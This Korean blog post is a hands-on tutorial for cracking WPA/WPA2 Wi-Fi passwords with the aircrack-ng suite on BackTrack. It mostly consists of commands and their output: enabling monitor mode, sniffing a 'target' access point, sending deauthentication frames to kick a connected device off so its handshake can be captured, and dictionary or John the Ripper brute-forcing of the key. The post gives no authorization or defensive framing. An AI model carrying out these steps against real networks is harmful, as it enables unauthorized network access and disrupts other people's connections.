wpa/wpa2는 같은 방식으로 사전대입방식을 사용한다.
TKIP , AES , TKIP/AES 모두 크랙가능
Wlan0를 모니터링 모드로 실행
root@bt:~# airmon-ng start wlan0 Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 2625 dhclient3 3236 dhclient3 Process with PID 3199 (ifup) is running on interface wlan0 Process with PID 3236 (dhclient3) is running on interface wlan0 Interface Chipset Driver wlan0 Ralink RT2870/3070 rt2800usb - [phy2] (monitor mode enabled on mon0)
공격대상 airodump-ng 로 스니핑 시작, 데이터는 wpa에 저장한다.
root@bt:~# airodump-ng -c 6 -w wpa --bssid 00:08:9F:64:DD:3C mon0 CH 6 ][ Elapsed: 1 min ][ 2016-01-28 07:39 ][ WPA handshake: 00:08:9F:64:DD:3 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 00:08:9F:64:DD:3C -127 1 997 513 3 6 54e WPA TKIP PSK W BSSID STATION PWR Rate Lost Frames Probe 00:08:9F:64:DD:3C DC:86:D8:24:02:0F -32 48e-48e 1804 762 00:08:9F:64:DD:3C 68:A3:C4:EF:FD:8B -32 54e-54e 0 100
공격대상 AP에 접속중인 디바이스가 있으면 접속을 끊어버리고, 다시 접속을 하도록 유도한다.
WPA 방식은 공격대상 AP에 접속을 하는 디바이스와의 접속승인 패킷만 있으면 자신의 컴퓨터에서 비밀번호 크랙이 가능
root@bt:~# aireplay-ng --deauth 10 -a 00:08:9F:64:DD:3C -c DC:86:D8:24:02:0F mon0 08:08:32 Waiting for beacon frame (BSSID: 00:08:9F:64:DD:3C) on channel 6 08:08:33 Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [ 0|64 ACKs] 08:08:33 Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [49|66 ACKs] 08:08:34 Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [39|67 ACKs] 08:08:34 Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [29|64 ACKs] 08:08:35 Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [ 0|64 ACKs] 08:08:36 Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [ 0|63 ACKs] 08:08:36 Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [ 0|63 ACKs] 08:08:37 Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [23|64 ACKs] 08:08:38 Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [20|64 ACKs] 08:08:38 Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [37|66 ACKs]
접속 승인때 발생한 패킷을 스니핑하여 wpa 파일에 저장이 되었으면
aircrack-ng로 비밀번호를 크랙한다.
(비밀번호 크랙방식은 사전 대입방식으로, 기본적으로 사전에 비밀번호가 있어야 비밀번호 크랙이 가능하다.
그래서 많은 양의 단어가 있는 사전을 구하는 것이 좋다)
root@bt:~# aircrack-ng wpa.cap -w /pentest/passwords/wordlists/rockyou.txt Opening crack_wpa.cap Read 4 packets. # BSSID ESSID Encryption 1 00:08:9F:64:DD:3C Wifitest WPA (1 handshake) Choosing first network as target. Opening crack_wpa.cap Reading packets, please wait... Aircrack-ng 1.1 r2178 [00:00:00] 1 keys tested (466.31 k/s) KEY FOUND! [ 12345678 ] Master Key : 0C 11 EE A1 B7 6F F4 D4 7C 65 2B 73 78 6D C6 A4 1A B3 D4 68 E5 BE EF 5C AA 29 67 AC 9C 7C 27 7E Transient Key : 59 77 8A D7 7F 38 64 67 F4 2C 58 86 5F 2A AC 44 A1 F3 1E 5F 84 1F E6 95 F3 69 5D 76 C6 3A 39 6C 68 A5 32 0B F6 6B 82 16 C0 72 A2 68 A4 D2 C6 2B 39 E7 8D 73 99 D2 C5 9C F3 7D D3 03 19 A0 A8 28 EAPOL HMAC : 91 A1 F0 FD C9 75 D1 54 01 14 84 EC 04 D9 CB AA root@bt:~#
사전대입방식이어서 자신만의 사전이 없으면 기본 내장되어 있는 사전을 이용하거나 자동으로 생성하는 프로그램을 이용해보자
John the ripper으로 비밀번호 풀기(자동생성 비밀번호) root@bt:~# /pentest/password/john/john --stdout --incremental:all | aircrack-ng -b 00:08:9F:64:DD:3C -w crack_output.txt-01.ivs 기본내장 비밀번호로 풀기 root@bt:~# aircrack-ng crack_output.txt-01.ivs -w /pentest/passwords/wordlists/darkc0de.lst rockyou.txt로 풀기 root@bt:~# aircrack-ng wpa-01.cap -w /pentest/passwords/wordlists/rockyou.txt
'Wifi' 카테고리의 다른 글
4) Wifi Wpa/Wpa2 비밀번호 크랙 가속화 (0) | 2016.03.06 |
---|---|
2) Wifi Wep 비밀번호 크랙 (0) | 2016.03.02 |
1) Wifi 패킷 스니핑 (0) | 2016.03.02 |